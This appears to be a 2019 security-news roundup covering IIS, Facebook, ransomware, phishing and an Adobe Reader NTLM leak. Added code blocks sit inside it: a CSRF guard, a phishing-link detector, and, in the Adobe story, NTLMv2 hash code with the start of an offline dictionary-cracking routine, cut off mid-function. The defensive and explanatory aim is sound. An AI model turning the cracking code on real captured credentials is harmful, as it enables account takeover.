Repairs & Upgrades

February 22, 2019

Microsoft fixes web server DDoS bug

By Danny Bradbury

Microsoft has fixed a bug that could have led to distributed denial of service (DDoS) attacks on its web server software.

The flaw lay in the way that Internet Information Server (IIS) processed requests sent using HTTP/2.

Ratified in 2015, HTTP/2 is an enhanced version of the original HTTP standard that includes better flow control and handles a wider variety of connections between clients and servers.

Flow control in HTTP/2 enables a client computer to describe how it wants to receive information from the sender so that it can work more efficiently.

For example, you might ask your browser to stream a high-bandwidth video, but then pause the video halfway through.

With HTTP/2, the browser can use flow control to pause the delivery and buffering of the video and concentrate on downloading something else that is suddenly more important, such as a real-time ticker update.


Flash “security bypass” list hidden in Microsoft Edge browser

By John E Dunn

Until this month, Microsoft’s Windows 10 Edge browser could skip over its own “Are you sure?” warnings about Flash content on 58 websites, thanks to a bypass list kept hidden from users.

Google Project Zero researcher Ivan Fratric said he stumbled on the list last November when he analysed domain hashes inside the edgehtmlpluginpolicy.bin file.

Fratric eventually resolved 56 of the 58 hashes, revealing a bypass list of domains that included Facebook, MSN, Deezer, and Yahoo Japan, all of which contain some legacy Flash content.

Having a bypass list built into Edge is risky, says Fratric.

Flash is well-known for vulnerabilities, which is why users are regularly reminded either to run it only when necessary or, better still, not run it at all.

Although the setting had limitations (the content must be hosted on the same domain or larger than 398×298 pixels), Fratric said he was alarmed at the reasoning behind having a list of this sort inside Edge that users know nothing about.


Facebook lets Android users block location tracking

By Lisa Vaas

Last week, CNBC reported that Facebook looks up users’ location data when it thinks they’re a threat to the company’s employees or facilities.

Until recently, granting an Android app access to your location was an all-or-nothing deal: you either had to turn off location and prevent the app from seeing your location at all, or you had to grant it full use of your location, even when you weren’t using the app.

That’s how Android works: Google requires that apps get permission to use your location, but unlike iOS, it doesn’t offer an option to share your location only when the app is in use.

This all changed on Wednesday this week when Facebook announced that it will be updating its location controls on Android to give people more choice over how the company collects location information and how the platform stores it.

Facebook said that it’s not making any changes to the choices that users have previously made, nor is it collecting any new information as a result of the update.


Facebook hoax? Can you sniff out gas station card skimmers using Bluetooth?

By Lisa Vaas

There’s a “helpful tip” making the Facebook rounds, and it’s a little bit helpful but a lot not so much.

It’s about using Bluetooth to detect credit card skimmers at gas stations:

Here is a helpful tip:

When you pull up to a gas station to fill your car. Search your phone for Bluetooth devices. If a sequence of letters and a sequence of numbers shows up in your device list do not pay at the pump. One of the pumps have a card reader installed. All card readers are Bluetooth.

The post refers to a card “reader,” but what it means is card “skimmer.”

The first is a legal way for you to pay, while the latter is a piece of thief-ware, be it a plastic gadget clumsily glued on to the face of an ATM or gas pump or technology that’s installed internally.

Credit card skimmers are devices that capture details from a payment card’s magnetic stripe, then (sometimes) beam them out via Bluetooth to nearby crooks.

The “sometimes” is just one thing that makes this viral post less than helpful.

Security journalist Brian Krebs has cataloged all sorts of skimmers, including some that send information to fraudsters’ phones via text message.


February 20, 2019

Hackers unleash social media worm after bug report ignored

By Danny Bradbury

What happens when you report a vulnerability to a website and it completely ignores your request, in spite of running a bug bounty program that’s supposed to pay for disclosures?

Some hackers might just walk away, but a group of app developers in Russia chose another approach. They used the vulnerability to spam thousands of users on Russia’s largest social network.

The group, called Bagosi, develops apps that run on St Petersburg-based VKontakte (VK), a social network with over 500m users owned by Russian Internet company

According to ZDNet, the group discovered a vulnerability in the social network and alerted developers there a year ago.

In a post on VKontakte, Bagosi explained that the social network ignored the bug report and didn’t pay the person that discovered it for their submission or acknowledge it in any way. This is in spite of the fact that VKontakte runs a bug bounty program with Hacker One. VK told Naked Security that the program has been running since 2015 and has paid out $250,000 in bounties. However, Hacker One also told us that the VK program is self-managed, meaning that the social network handles bug reports using its own internal teams rather than relying on Hacker One’s employees.


Facebook tracks users it thinks may harm its employees

By Lisa Vaas

Have you ever been so enraged at Facebook that you’ve messaged CEO Mark Zuckerberg and told him to f— off? …or maybe you simply left that type of comment in a post somewhere on Facebook or one of its apps?

If so, you might well have been inducted into what CNBC reports is the company’s BOLO watch list. That’s an acronym for Be On Lookout: a list of hundreds of people who have threatened Facebook or its staff, sulked over losing a contract, or gotten fired, be it with or without sulking or emotional outbursts.

Keeping a list like that is not, in itself, unusual. Lots of companies keep similar lists, according to CNBC’s sources, which include former security staff from Facebook who are familiar with its program and at least one expert from the physical security field: Tim Bradley, senior consultant with Incident Management Group, a corporate security consulting firm that deals with employee safety issues.

What’s unique about Facebook’s approach to BOLOs is that it doesn’t just disseminate a list of names to security staff. Facebook also mines its platform for threatening posts. Sometimes, Facebook goes so far as to use its apps to discern the whereabouts of people whom it finds threatening, to determine whether they pose a credible threat.

CNBC talked to more than a dozen former Facebook security employees, some of whom questioned the ethics of Facebook’s security strategies. One former security staffer called the tactics “very Big Brother-esque.”


Google’s working on stopping sites from blocking Incognito mode

By Lisa Vaas

Google Chrome’s Incognito mode hasn’t been an impenetrable privacy shield: For years, it’s been a snap for web developers to detect when Chrome users are browsing in private mode and to block site visitors who use it.

Google’s known all about it. And finally, 9to5Google reports, it looks like the company plans to close the loophole that’s enabled sites to detect when you’re using Incognito mode.

That loophole: websites have detected Incognito mode by trying to use an API that the mode turns off.

There are many ways to detect Incognito mode: as 9to5Google suggests, if you search for “how to detect Incognito mode,” you’ll find that developers have contributed ways to do so on Stack Overflow.

One easy way has been to sniff out that API: a developer can simply try to use Chrome’s FileSystem API, which is disabled in Incognito mode. That API is used by apps to store files, be it temporarily or more permanently. Incognito shuts it off entirely so that the API won’t create permanent files that could jeopardize somebody’s privacy.


Facebook flaw could have allowed an attacker to hijack accounts

By John E Dunn

If you’re a security researcher in search of a fat bug bounty, Facebook must look like a good place to start your next hunt.

The site has suffered a lot of niggling security flaws in recent times, to which can now be added a new Cross Site Request Forgery (CSRF) protection bypass flaw that could have allowed an attacker to hijack a user’s account in several ways.

Discovered by researcher ‘Samm0uda’ in January, the problem centers around what is technically known as a vulnerable URL “endpoint”, in this case  Explains the researcher:

This endpoint is located under the main domain which makes it easier for the attacker to trick his victims to visit the URL.

CSRF attacks happen when a cybercriminal tricks the user into clicking on a malicious link that submits instructions to the vulnerable site that appear to come from the user’s browser.

All that is required for this to work is that the user must be authenticated (i.e. logged in) when this happens, although the victim remains unaware that anything untoward is happening.

The technique has been popular for years, which is why websites use anti-CSRF tokens that are reset every time there is a state-changing request.
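As an added illustration of the anti-CSRF token defence described above (example code, not Facebook's or the researcher's), here is a minimal synchroniser-token guard: each session carries a random token that state-changing requests must echo back, the comparison is constant-time, the token is rotated after every successful state-changing request, and an `Origin` header check is layered on top. The session store and site origin are constructed stand-ins.

```python
import hmac
import secrets


class CsrfGuard:
    """Synchroniser-token CSRF protection for a web application.

    A cross-site request forged from a third-party page rides on the
    victim's session cookie, but the attacking page cannot read the
    per-session token embedded in the site's own forms, so the echoed
    token is missing or wrong and the request is refused.
    """

    STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}

    def __init__(self, site_origin):
        self.site_origin = site_origin   # e.g. "https://www.example.test" (constructed)
        self.sessions = {}               # session_id -> {"csrf": token}; stand-in store

    def new_session(self):
        """Create a session (cookie value) with a fresh random CSRF token."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = {"csrf": secrets.token_urlsafe(32)}
        return sid

    def token_for(self, sid):
        """Token the server embeds in forms or hands to JS for a custom header."""
        return self.sessions[sid]["csrf"]

    def check_request(self, sid, method, submitted_token, origin=None):
        """Return True if the request may proceed, False if it must be rejected."""
        sess = self.sessions.get(sid)
        if sess is None:
            return False                      # no valid session cookie
        if method.upper() not in self.STATE_CHANGING:
            return True                       # safe methods carry no token
        # Defence in depth: a browser-supplied Origin that is not ours is a
        # cross-site request regardless of what token was submitted.
        if origin is not None and origin != self.site_origin:
            return False
        if not submitted_token:
            return False
        # Constant-time comparison so token bytes cannot be guessed via timing.
        ok = hmac.compare_digest(sess["csrf"].encode(), submitted_token.encode())
        if ok:
            # Reset the token after each state-changing request, as the
            # article describes, so a captured token cannot be replayed.
            sess["csrf"] = secrets.token_urlsafe(32)
        return ok


def demo():
    """Walk through a legitimate request and a forged one; returns a summary dict."""
    guard = CsrfGuard("https://www.example.test")
    sid = guard.new_session()
    token = guard.token_for(sid)
    return {
        "legit_get": guard.check_request(sid, "GET", None),
        "forged_post_no_token": guard.check_request(sid, "POST", None,
                                                    origin="https://attacker.example.test"),
        "legit_post": guard.check_request(sid, "POST", token,
                                          origin="https://www.example.test"),
        "replayed_token": guard.check_request(sid, "POST", token),
    }


if __name__ == "__main__":
    print(demo())
```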


Millions of “private” medical helpline calls exposed on internet

By Paul Ducklin

Thanks to Sophos security expert Petter Nordwall for his help with this article.

You know when you call a helpline and a cheery voice advises you that your call may be recorded for a variety of reasons, all of which are supposed to be for your benefit?

Have you ever wondered what happens to all those recordings?

Could something you said confidentially on the phone back in 2014 – personal and private information disclosed during a call to an official medical advice line, for example – suddenly show up in public in 2019?

As millions of people in Sweden are suddenly realizing, the answer is a definite “Yes”.

One of the subcontractors involved in running the Swedish medical assistance line 1177 (a bit like 111 in the UK – the number you use for urgent but not emergency medical help) apparently left six years’ worth of call records – 2,700,000 sound files in WAV and MP3 format – on a server that was openly accessible on the internet.

All you’d have needed was a web browser to scroll through and download years of confidential calls.


Thousands of Android apps bypass Advertising ID to track users

By John E Dunn

Six years after it was introduced, it looks as if Android’s Advertising ID (AAID) might no longer be the privacy forcefield Google claimed it would be.

New research by AppCensus has found that 18,000 Play Store apps, many with hundreds of millions of installs, appear to be sidestepping the Advertising ID system by quietly collecting additional identifiers from users’ smartphones in ways that can’t be blocked or reset.

Among the best-known offenders were news app Flipboard, Talking Tom, Clean Master AV Cleaner & Booster, Battery Doctor, Cooking Fever, and Cut the Rope Full Free, which were found to be sending data to advertising aggregators.

But what is the Advertising ID and why does it matter?

Few Android users pay much attention to it, but in 2013 the Advertising ID seemed like a great idea.

At that time, apps were allowed to collect a lot of data unique to the user’s device, such as its Android ID, IMEI number, hardware MAC address, and SIM card serial number – any one or combination of which could be used to track and profile users.


February 19, 2019

If you think your deleted Twitter DMs are sliding into the trash, you’re wrong

By Lisa Vaas

You can’t erase your Twitter footsteps, it turns out: what goes into Twitter stays lodged in its guts for years.

That’s because of a glitch that a bug hunter is calling a “functional bug.” The bug, discovered by security researcher Karan Saini, keeps direct messages (DMs) from being completely deleted, regardless of whether you or others have deleted the messages or even if the accounts that sent or received the DMs have been deactivated and suspended.

Saini told TechCrunch that he found years-old messages in a file when he downloaded an archive of his data from Twitter accounts that he’d previously deleted.

You can download data from your own account(s) here to get an idea of everything that Twitter collects, and retains, on you.

The researcher says that he reported a similar bug, found a year earlier but not disclosed until now, that allowed him to use a since-deprecated API to retrieve DMs even after a message was deleted from both the sender and the recipient. That earlier bug couldn’t get at DMs from suspended accounts, however.


Facebook acts like a law-breaking ‘digital gangster’, says official report

By Lisa Vaas

On Sunday, following an investigation of more than a year, the UK Parliament accused Facebook of thumbing its nose at the law, having “intentionally and knowingly violated both data privacy and anti-competition laws”.

Lawmakers called for the Information Commissioner’s Office (ICO) to investigate the social media platform’s practices, including how it uses the data of both users and users’ friends, as well as its use of “reciprocity” in data sharing.

Their report, which centered on disinformation and fake news, was published by a House of Commons committee – the Digital, Culture, Media and Sport Committee – that oversees media policy. From that report:

Companies like Facebook should not be allowed to behave like ‘digital gangsters’ in the online world, considering themselves to be ahead of and beyond the law.

The investigation focused on Facebook’s business practices before and after the Cambridge Analytica scandal.

Facebook shouldn’t be allowed to wriggle out from under culpability for the content users have pushed through on its platforms, the report said, alluding to how it was used by foreigners to tinker with the 2016 US presidential election and the Brexit campaign:

Facebook’s handling of personal data, and its use for political campaigns, are prime and legitimate areas for inspection by regulators, and it should not be able to evade all editorial responsibility for the content shared by its users across its platforms.

Facebook: Bring it!


Fake text generator is so good its creators don’t want to release full version

By Danny Bradbury

Researchers at Elon Musk’s AI think tank OpenAI have created what amounts to a text version of a deepfake – and it’s too scared for humanity to release the full version.

Its AI writing tool generates reasonable-looking text on a wide range of subjects. It is based on research that the organization did to predict the next word in a sequence of text, it explains in a blog post on the topic. The tool takes a sample piece of text written by a human and then writes the rest of an article, producing dozens of sentences from a single introductory phrase.

The tool doesn’t discriminate between topics. Instead, it uses over 40Gb of text gathered from the internet to help it produce convincing-sounding copy on anything from Miley Cyrus to astrophysics.

The problem is that while the copy sounds convincing, all the facts in it are fabricated. The tool writes names, facts and figures effectively synthesized from something that the system read online. It’s like an electronic version of that old school friend who you regrettably accepted a Facebook invitation from and who now keeps writing bizarre posts with ‘alternative facts’. For example, it takes the following phrase…

A train carriage containing controlled nuclear materials was stolen in Cincinnati today. Its whereabouts are unknown.

…and builds an entire news story around a fictional event. It fabricates a quote from Tom Hicks, who it says is the US Energy Secretary. At the time of writing, that role is occupied by Rick Perry.


Mega-crackers back with nearly 100 million new stolen data records

By Paul Ducklin

The cracker who recently put 620 million breached records up for sale…

…is back with close to 100 million more, according to reports.

Just over five years ago, we jokingly coined the phrase “one hundred million club”, following Adobe’s then-epic leaking of 150 million records.

Back then, breaches with that many records exposed at the same time were rare.

These days, we frequently hear of breaches that are well above 100 million records, for all that they often involve aggregated breaches of multiple servers and services, possibly collected over many years.

For example, we recently saw Collection #1 hit the underground market, with more than 700,000,000 unique records, closely followed by four more breach collections, imaginatively named Collection #2 to #5, with a further 2.2 billion items.


February 18, 2019

Opera integrates a cryptocurrency wallet – is this Web 3.0?

By John E Dunn

When it appears in the next few weeks, the latest version of Opera (“Reborn 3” or “R3”) for Windows, Mac and Linux will become the first mainstream desktop browser to integrate a cryptocurrency wallet.

If you believe cryptowallets are about to become an important way to pay for things on the web, this will sound like another tick in the box for a Chromium-based browser that is still innovating furiously to stay in touch with Chrome, Safari and Firefox.

Alternatively, if you don’t use cryptowallets, you’ll wonder what all the fuss is about – what’s the big deal about a browser with a desktop wallet when there are already plenty of standalone mobile decentralized apps (DApps) that do the same job.

To begin answering this question, in December, Opera Mobile for Android integrated an Ethereum (ETH) Web3 API wallet of its own (served through a platform called Infura), effectively turning its mobile browser into a convenient interface for managing cryptocurrency.

This integrates with the wallet inside Opera R3, which avoids having to have a separate wallet for Windows or Mac as well as providing an easy way for the mobile device to authenticate desktop transactions using something as simple as a fingerprint.


Will the EU’s new copyright directive ruin the web?

By Lisa Vaas

The Mars Rover wasn’t the only thing to die last Wednesday. The EU also took another copyright-focused step toward killing the freedom to use memes and what critics say will be the death of the web as a place to freely exchange information.

That tweet comes from one of many people who were concerned when the European Parliament on Wednesday finalized text in the Copyright Directive: legislation whose purpose is to drag copyright law into the digital age and ensure that content creators get paid for their work, be it newspaper copy, music or other copyrighted content.

Due to widely loathed articles in the directive, it or its articles have been called the ‘meme killer’, the ‘link tax’ and the ‘censorship machine’. Those articles, Articles 11 and 13, remain intact in the final text, as final efforts to remove them have failed.

At this point, the only thing standing in the way of the Copyright Directive becoming law is a full vote by the European Parliament and European Council.


Apple fighting pirate app developers, will insist on 2FA for coders

By Paul Ducklin

Remember how the world’s biggest social network got into trouble with Apple recently over an app called Facebook Research?

The app wasn’t designed for general use – in fact, Facebook couldn’t make it openly available to everyone because it was too snoopy to be allowed in the App Store.

Amongst other things, it peeked into some or all of the network traffic from your other apps, with the goal of improving Facebook by learning more about how people behaved online.

Keeping low-level tabs on what other apps are up to isn’t permitted in regular iPhone software, so Facebook got around these restrictions by offering the app in a limited-access version under Apple’s Enterprise Certificate programme.

That’s the system that businesses can use to write, build and digitally sign apps for their own staff without waiting for Apple to sign the app into the App Store first.

Simply put, it’s the closest thing that Apple has to Google’s “allow apps from unknown sources” option in Android, and it’s the only way, short of jailbreaking, to install software on an iPhone without going to the App Store.


Judge won’t unseal legal docs in fight to break Messenger encryption

By Lisa Vaas

On Monday, a federal judge ordered that legal documents about the government’s fight to force Facebook to break Messenger encryption will be kept secret, Reuters reports.

In doing so, the judge denied motions from the American Civil Liberties Union (ACLU), the Washington Post and other groups that sought to unseal a federal court’s order to force Facebook to wiretap Messenger conversations, which are encrypted end to end.

The case concerned encrypted voice conversations. Investigators wanted to listen in on the conversations as part of an investigation into MS-13, a violent international gang that originated in Los Angeles. The law had already been listening in on ordinary phone calls and Messenger texts between the alleged gang members, but there were reportedly three Messengers calls that they couldn’t hear.

Reuters reports that the suspects on those calls were arrested anyway.

Spokespeople for the ACLU and the DOJ declined to comment, and Facebook’s arguments are sealed. However, US District Judge Lawrence O’Neill, in Fresno, California, reportedly wrote that Facebook was in favor of unsealing the documents, while the DOJ was not.


Should we profit from the sale of our personal data?

By Lisa Vaas

You are worth $7.37 to Facebook. You are worth $2.83 to Twitter. You are worth 30 cents to Reddit.

Dagnabbit, it’s time to cash in!

That’s the cry from newly minted California Governor Gavin Newsom, who, in delivering his first state of the state address on Tuesday, said it’s time for the state’s consumers to get a cut of the profit tech companies are making by selling users’ personal data.

He asked his aides to cook up a proposal for a “data dividend” to enrich the financial portfolios of California residents, but he gave no hint as to how that might work. Would Twitter cut each user a check? Would Facebook be hit up with a new tax?

We’ll have to wait and see, but in the meantime, Newsom said, these tech giants are rolling in data-derived dough:

Companies that make billions of dollars collecting, curating and monetizing our personal data have a duty to protect it. California’s consumers should also be able to share in the wealth that is created from their data.

Earlier this week, our worth to social media networks was estimated by Axios, which got to those you-are-worth-pennies estimates by pretty much just dividing the platforms’ annual revenues by their numbers of monthly active users.


Chinese facial recognition database exposes 2.5m people

By Danny Bradbury

A company operating a facial recognition system in China has exposed millions of residents’ personal information online.

Shenzhen-based SenseNets is an artificial intelligence company that uses a network of tracking cameras to spot people and log their movements in its database. Unfortunately, the company exposed that information publicly online, allowing anyone to access it in plain text, it emerged this week.

Dutch cybersecurity researcher Victor Gevers found the vulnerable database online and tweeted about it.

The database housed records on over 2.5m people, including their gender, nationality, address, date of birth, photo, and employer. A lot of this was linked to their ID card number, which was also revealed in the database records. China maintains a compulsory national identity card system for residents.

SenseNets maintained a collection of trackers which logged whomever it identified in the database. This created over 6.6m logged entries in a single 24-hour window, Gevers revealed.


Photography site 500px resets 14.8 million passwords after data breach

By John E Dunn

Photography website 500px has become the latest online brand to admit suffering a serious data breach.

In an advisory, the company said it became aware of the breach last week. It estimates that the breach took place around 5 July last year.

This affected the majority of the site’s nearly 15 million users, who should shortly receive an email asking them to change their passwords as soon as possible.

Data stolen included names, usernames, email addresses, birth date (if provided), city, state, country, and gender. Also at risk:

A hash of your password, which was hashed using a one-way cryptographic algorithm.

The company hasn’t said which hashing algorithms were in use beyond mentioning that any using the obsolete MD5 function were being reset.

The fact it was using MD5 at all is not terribly reassuring for reasons Naked Security has previously discussed at some length.

A sliver of good news:

At this time, there is no indication of unauthorized access to your account, and no evidence that other data associated with your user profile was affected, such as credit card information (which is not stored on our servers), if used to make any purchases, or any other sensitive personal information.

Who is affected?

Everyone who had an account with 500px on or before 5 July 2018 may be affected by the breach. Users who joined after that will also have to change their passwords (which initiates automatically the next time a user tries to log in) although they will receive notification to do this later than the bulk of affected account holders.


Inside a GandCrab targeted ransomware attack on a hospital

By Mark Stockley

Thanks to Sophos experts Vikas Singh and Peter Mackenzie for the research in this article.

Just before 9pm on Sunday, 3 February 2019, a GandCrab executable sparked into life for an instant, before its brief existence was snuffed out by antivirus software. Stopped in its tracks, the malware triggered the first of what would quickly become hundreds of separate alerts for a US healthcare provider in the grip of a targeted ransomware attack.

The organisation’s network of about 500 computers found itself fending off two attacks involving GandCrab ransomware. Because some of the computers on the network weren’t protected by antivirus, the attack provides an unusually colourful illustration of both how a targeted ransomware attack happens, and how different layers of protection interact in defense.

This is how the attack unfolded and how you can stop it happening to you.


Ransomware is malware that encrypts the contents of a computer and then demands a ransom in return for decrypting it. Ransomware is normally distributed in large scale, untargeted attacks that use malicious websites or email attachments to infect as many victims as possible. Victims are typically asked to pay a few hundred dollars’ worth of Bitcoin to free themselves from the ransomware’s grip.


What’s behind this 1,000-character phishing URL?

By Danny Bradbury

Phishing sites are common, but this week the internet found a strange strain that’s a little rarer: a phishing site with a URL almost a thousand characters long. Experts have a good theory about why a scammer would go to all that trouble.

Bleeping Computer learned of a strange phishing campaign which uses an unusually long URL. The mail purports to come from your email provider, telling you that your account has been blacklisted due to multiple login failures. The phisher tries to hook your mail login credentials by getting you to log in again, but of course, the link it provides isn’t really a link to your login provider’s page.

Phishing links generally arrive behind an innocuous piece of text like ‘log in’, ‘reauthorise’ or ‘validate’. Hyperlinks separate the text from the actual links that they follow, though, and unless a victim hovers over the text or right-clicks it, or checks the address bar of their browser after clicking on the link, they won’t know what sites they’re really visiting.

Phishers are aware of this and diligent ones will try to lure you with a URL that looks plausible. They’ll use tricks like top-level domains (TLDs) designed to look like the last couple of words in a legitimate domain, or homographs that use foreign character sets to create English-looking letters. Hyphens and subdomains are also a good way of creating URLs that look like a legitimate site at first glance.
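To turn the lure patterns listed above (oversized URLs, lookalike TLDs and subdomains, hyphenated brand names, homograph characters) into a mail-gateway check, here is an added example that is not from the original article or from Bleeping Computer. The protected-domain list, the small confusables table and the length threshold are constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed allow-list: the domains whose users this gateway protects.
PROTECTED_DOMAINS = {"example-bank.com", "example-mail.com"}

# Constructed confusables table: a few Cyrillic letters that render like
# Latin ones. A real deployment would use the full Unicode confusables data.
CONFUSABLES = str.maketrans({"а": "a", "е": "e", "о": "o",
                             "р": "p", "с": "c", "х": "x"})


def registered_domain(host):
    """Naive eTLD+1 (last two labels); adequate for the .com/.net samples here."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def analyse_link(url, max_len=200):
    """Return a list of warnings for a link.

    An empty list means none of the lure patterns was spotted; it is not
    proof that the link is safe.
    """
    warnings = []
    host = (urlsplit(url).hostname or "").rstrip(".")
    reg = registered_domain(host)

    # Unusually long URLs, like the near-1,000-character one in the article.
    if len(url) > max_len:
        warnings.append(f"url length {len(url)} exceeds {max_len}")

    # Homographs: a host with non-ASCII letters, or one already in punycode.
    if any(ord(ch) > 127 for ch in host):
        try:
            ascii_form = host.encode("idna").decode("ascii")
        except UnicodeError:
            ascii_form = "<unencodable>"
        warnings.append(f"non-ASCII characters in host (punycode {ascii_form})")
        # Fold confusable letters to Latin and see whether a protected brand emerges.
        skeleton = registered_domain(host.translate(CONFUSABLES))
        if skeleton in PROTECTED_DOMAINS:
            warnings.append(f"homograph of protected domain {skeleton}")
    elif any(label.startswith("xn--") for label in host.split(".")):
        warnings.append("punycode label in host")

    # TLD, subdomain and hyphen tricks: the brand name appears somewhere in
    # the host (brand.com.attacker.tld, secure-brand.tld) but the domain that
    # was actually registered is something else.
    for brand in PROTECTED_DOMAINS:
        if reg == brand:
            continue
        if brand.split(".")[0] in host:
            warnings.append(f"'{brand}' lookalike: registered domain is {reg}")
    return warnings


if __name__ == "__main__":
    for link in ("https://www.example-bank.com/login",
                 "https://example-bank.com.attacker-example.net/login",
                 "https://exаmple-bank.com/"):        # Cyrillic 'а' in the host
        print(link, "->", analyse_link(link))
```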


January 14, 2019

Another flaw found in macOS Mojave’s privacy protection

By John E Dunn

Ever since Apple announced enhanced privacy protection for macOS Mojave 10.14 last September, a dedicated band of researchers has been poking away at it looking for security flaws.

Embarrassingly for Apple, it’s not proved a tough challenge with the first turning up on launch day when one researcher reported a surprising bypass of privacy protection using an ordinary app (i.e. no admin permission) to access the address book.

The protection, accessed via System Preferences > Security & Privacy > Privacy, saw other reported bypasses follow soon after, all apparently addressed by updates to Mojave.

Last week, just when it looked as if Apple might have got on top of the issue, StopTheMadness browser extension developer Jeff Johnson announced a new issue affecting all versions of Mojave including the 10.14.3 supplemental update released only days earlier.

According to Johnson, he discovered a way to access ~/Library/Safari without asking the system or user for permission – a directory that should only be accessible via privileged apps such as the macOS Finder.

There are no permission dialogs, it Just Works™. In this way, a malware app could secretly violate a user’s privacy by examining their web browsing history.

The only caveat was that the bypass doesn’t work for sandboxed apps; it applies to apps running outside the sandbox, including “notarised” apps (i.e. those signed by a Developer ID that have passed Apple’s automated malware checks).


Evil USB O.MG Cable opens up Wi-Fi to remote attacks

By Lisa Vaas

Take a look at one of your USB cables and you’ll probably see an icon. It might look like a trident, with a vector, circle and square stemming off the main branch.

What do those three symbols mean? You can find multiple suggestions online. We’re less inclined to believe that it was created by Al Gore to represent a three-pronged attack on the earth, and more comfortable with the suggestion that the icon likely indicates that the cable delivers three things: data, power, and audio/video.

Well, thanks to a tinkerer, that USB icon is going to need a fourth tine, perhaps ending in an image of a burglar – because he’s rigged a USB cable to allow remote attackers to attack via Wi-Fi. Security researcher Mike Grover, who goes by the alias MG, has implanted this open door into a USB-C cable that looks like any other innocuous cable you’d see lying around in a conference room.

Why bother with USB drives? They’re already suspicious enough. Go for the cable instead, his thinking was.

The cable, dubbed the O.MG Cable, can be plugged into a Linux, Mac or Windows computer and allows attackers to execute commands over Wi-Fi as if they were sitting in front of the system, issuing commands with a mouse and keyboard.

That’s because the operating system detects the cable as part of an input device, or what’s known as a human interface device (HID). Because operating systems consider HID devices to be input devices, they can be used to input commands as if those commands are being typed on a keyboard.


620 million records from 16 websites listed for sale on the Dark Web

By Lisa Vaas

The pockets of credential stuffers and spammers have been potentially fattened by another 617 million pilfered accounts, hacked out of 16 websites and now allegedly up for sale on the Dark Web.

The Register reports that a seller on the Dream Market – a Dark Web marketplace hidden by the encrypted layers of Tor – began offering these stolen databases on Monday, with the following account counts:

  • Dubsmash: 162 million
  • MyFitnessPal: 151 million
  • MyHeritage: 92 million
  • ShareThis: 41 million
  • HauteLook: 28 million
  • Animoto: 25 million
  • EyeEm: 22 million
  • 8fit: 20 million
  • Whitepages: 18 million


Security firm beats Adobe by patching reader flaw first

By Danny Bradbury

Adobe has patched a flaw that enabled attackers to slurp a user’s network authentication details – but not before someone else patched it first.

Security researcher Alex Inführ discovered a flaw in Adobe Reader that let a malicious PDF file trigger a callback from the program: on opening the document, Reader would connect to an attacker-controlled server using Microsoft’s SMB protocol and send it the user’s hashed authentication details.

The flaw stemmed from XML Forms Architecture (XFA), an XML structure inside a PDF that lets users fill out forms. Loading a remote XML-based stylesheet for an XFA form via an insecure HTTPS-based URL prompts Reader to ask for user confirmation before visiting that URL. By using a Universal Naming Convention (UNC) path instead, the attacker can stop that security dialog from appearing. The result is that opening the booby-trapped file causes the user’s machine to send their NTLMv2 (NT LAN Manager version 2) response to the attacker.

That’s pretty significant, because the NTLMv2 response is derived from a hash of the user’s Windows password: anyone who captures it, along with the challenge their rogue server supplied, can run an offline password-guessing attack against it without ever contacting the victim again. Various hackers have already detailed methods of cracking NTLMv2 responses using automated tools.
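To make concrete what “sending the NTLMv2 hash” means, here is an added Python example (not code from the article, from Adobe or from Inführ) that computes an NTLMv2 response the way a Windows client does, and then runs the offline dictionary attack an attacker would run on a captured one. The user name, domain, server challenge, client blob, victim password and wordlist are all constructed; MD4 is implemented in pure Python because many OpenSSL 3 builds expose it only through the legacy provider, so hashlib.new('md4') cannot be relied on.

```python
"""
NTLMv2 response computation plus an offline dictionary attack on a captured
response. Added example, not code from the article, from Adobe or from
Alex Inführ; the user name, domain, server challenge, client blob, victim
password and wordlist below are all constructed for the demonstration.
"""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); see the lead-in for why hashlib is not used."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)            # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = h
        for i in range(16):                                # round 1
            a = _lrot((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                # round 2
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                # round 3
            a = _lrot((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(s + v) & MASK32 for s, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 of the UTF-16LE password. Unsalted, so identical for every
    user who picked that password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """HMAC-MD5 keyed with the NT hash over the upper-cased user name + domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 over the 8-byte server challenge and the client blob
    (timestamp, client nonce, target info). A rogue SMB server captures this
    together with the challenge it chose and the blob the client sent."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, server_challenge: bytes, blob: bytes, proof: bytes) -> str:
    """user::domain:challenge:proof:blob, the layout capture and cracking tools use."""
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), proof.hex(), blob.hex())


def crack(line: str, wordlist):
    """Offline dictionary attack. Nothing here touches the network or the
    victim, which is why one captured response is all the attacker needs."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
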